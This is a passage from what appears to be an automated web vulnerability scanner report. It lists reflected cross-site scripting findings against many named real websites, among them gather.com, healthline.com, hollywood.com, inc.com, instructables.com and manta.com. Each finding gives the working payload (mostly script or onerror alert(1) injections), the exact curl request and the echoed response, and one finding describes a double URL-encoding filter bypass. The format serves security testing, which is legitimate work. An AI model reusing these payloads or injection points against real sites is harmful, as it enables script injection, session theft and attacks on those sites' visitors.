Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 13:33:25 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: LandingUrl=http://www.gamestop.com/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6; path=/
Set-Cookie: CampaignHistory=; path=/
Set-Cookie: BIGipServerwww.gamestop.com-80=600446124.20480.0000; path=/
Content-Length: 181788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6' id='header_auth_actions' rel='nofollow'>
...[SNIP]...
6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b was submitted in the REST URL parameter 1. This input was echoed as 12711<img src=a onerror=alert(1)>929de4ce53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:22 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=4A24C55EA8AA587CCF8856C6C9BFB24A; Domain=.gather.com; Path=/
Set-Cookie: vis=RyOcPuDxMFUGP3B0WVrMrdgk+Fv7TLiAW3OByYniiiDpLR+P/Pm0tG1Nows/zVLDfFPcwb2RlnPBjDhfuWVzAqWnKeeDBF1/gMVhlwJ1RSc=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=KW1zZbLcDLkbttCjTEPka5YrQnepZ8pHskgphI0gOdszkdWMqudZ95Jb7/76/tOlkeRmmJL7fpmjoICIH6sXwwAd09L9KZQWlUI0WxvLZi3sfdXOAhI/xZQCjpJNlT+R; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>12711<img src=a onerror=alert(1)>929de4ce53b</em>
...[SNIP]...
6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3197c"><a>1af48c031bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /3197c"><a>1af48c031bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=DA1461106BFAE965E4902BC6A28B47D8; Domain=.gather.com; Path=/
Set-Cookie: vis=UjjmQmSy0/vTCt18edV5yG7Hdy8T9xl9k7Es17tCqMMJpFjxuqlR5UcQ461iN1fmmD5JU4aHsvhJi8Y6SPee6UXzWH78Piq8kZfJO9L+2ZU=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=3O1JaJHhBrlqO2HsxQwvvNgk+Fv7TLiAn1BRbSOCyEOukF3ZG9POyIobiPsZ/q8ko5SAnn39resA8mu0ppEVBXCt9+uNQE6iPrjrPjwNPHYdyAEmmABmC03bbftbh5TG; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17459
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="3197c"><a>1af48c031bb" >
...[SNIP]...
6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98084"><script>alert(1)</script>c7f5e1781ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico98084"><script>alert(1)</script>c7f5e1781ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:57:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=m5h7u4477a8qnj9sg8pmkq0895; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<title>4
...[SNIP]...
<form id="testform" action="/404.php/favicon.ico98084"><script>alert(1)</script>c7f5e1781ab" method="post">
...[SNIP]...
6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4f5'%3bd3fe8a4b78d was submitted in the REST URL parameter 1. This input was echoed as 6e4f5';d3fe8a4b78d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico6e4f5'%3bd3fe8a4b78d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico6e4f5';d3fe8a4b78dservletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
anguage="JavaScript" src="http://ad.doubleclick.net/adj/hn.us.hl.er.x.x.x/none' + btk1 + btk2 + ';kw=generalhealth;k1=none;k2=none;k3=health;pos=lb;ac=32688|32431|32457|35032|32461;pv=;url=/favicon.ico6e4f5';d3fe8a4b78d;type=top_rb;bf=no;tile=' + dfpTileIdx++ + ';sz=728x90;dcopt=ist;ord=' + hlnord + ';u=generalhealth|none|none|health|32688,32431,32457,35032,32461|lb||||/favicon.ico6e4f5';d3fe8a4b78d|top_rb||?" type="
...[SNIP]...
6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c252"%3b2599a835db0 was submitted in the REST URL parameter 1. This input was echoed as 7c252";2599a835db0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico7c252"%3b2599a835db0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico7c252";2599a835db0servletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
cadc=0;var erpm=0;
/*var unicaEvents = new Array();
var unicaEventIdx = 0;*/
var g_cfn="generalhealth";
var g_cfn_bold = "generalhealth";
var g_encoded_uri = encodeURI("/favicon.ico7c252";2599a835db0");
</script>
...[SNIP]...
6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 was submitted in the REST URL parameter 1. This input was echoed as 2d966";alert(1)//0182ae2d622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zb0r3g55zp22f1foo3vkycei; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hollywood.com </title>
<script type="text
...[SNIP]...
function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="h.hollywood.com";
hbx.acct="DM550817IOBZ38EN3";
hbx.pn="404/favicon.ico2d966";alert(1)//0182ae2d622";
hbx.mlc="Error";hbx.pndef="";hbx.ctdef="full";hbx.lt="auto";
hbx.dlf="n";
</script>
...[SNIP]...
6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b186"><script>alert(1)</script>7e885573fb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b186"><script>alert(1)</script>7e885573fb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:20:54 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="returl" value="http://www.inc.com/favicon.ico4b186"><script>alert(1)</script>7e885573fb4">
...[SNIP]...
6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 492f7<script>alert(1)</script>1ee22699fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico492f7<script>alert(1)</script>1ee22699fd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Cache-Control: no-cache
X-Cacheable: no-404
Content-Length: 17716
Date: Sat, 02 Apr 2011 13:37:19 GMT
X-Varnish: 4085213196
Age: 0
Via: 1.1 varnish
X-Cache-Svr: squid03.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
&nbsp;&nbsp;We're sorry, the URL http://www.instructables.com/favicon.ico492f7<script>alert(1)</script>1ee22699fd5 is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...
6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4633</script><script>alert(1)</script>ef96f9ca301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof4633</script><script>alert(1)</script>ef96f9ca301 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:52 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Sat, 02 Apr 2011 13:44:52 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/favicon.icof4633</script><script>alert(1)</script>ef96f9ca301");
</script>
...[SNIP]...
6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0854"><script>alert(1)</script>62f1be08ee8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0854"><script>alert(1)</script>62f1be08ee8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22702

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6772046&amp;c3=&amp;c4=www.letssingit.com/favicon.icoc0854"><script>alert(1)</script>62f1be08ee8&amp;c5=&amp;c6=&amp;c15=&amp;cj=1"/>
...[SNIP]...
6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc674"-alert(1)-"1a90c41c69d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocc674"-alert(1)-"1a90c41c69d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icocc674"-alert(1)-"1a90c41c69d",c5:"",c6:"",c15:""});</script>
...[SNIP]...
6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5ac2"><script>alert(1)</script>25e47d014c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof5ac2"><script>alert(1)</script>25e47d014c2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mainstreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:47 GMT
Server: Apache
Set-Cookie: SESS0e250a232fad80ec5d88c23e55d760d9=u0phpluvnnfdapsm79149neq37; expires=Mon, 25 Apr 2011 17:38:07 GMT; path=/; domain=.mainstreet.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:04:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
X-Debug: msweb04
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Node type: site_content (4100)
Node title: 404 Page
Last Generated: 20110
...[SNIP]...
<link rel="canonical" href="http://www.mainstreet.com/favicon.icof5ac2"><script>alert(1)</script>25e47d014c2" />
...[SNIP]...
6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6ae0<script>alert(1)</script>b625fad29ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof6ae0<script>alert(1)</script>b625fad29ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4714
X-Varnish: 2363475455
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.icof6ae0<script>alert(1)</script>b625fad29ae at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243<br>
...[SNIP]...
6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d5c"><script>alert(1)</script>8122b86cb15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4718
X-Varnish: 2363475440
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243">
...[SNIP]...
6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b779f<script>alert(1)</script>fb24f2fd142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4720
X-Varnish: 3115951942
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243<br>
...[SNIP]...
6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c655a"><script>alert(1)</script>db5a4dbfb1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4724
X-Varnish: 1295727862
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243">
...[SNIP]...
6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4257a"-alert(1)-"d960cce6c75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

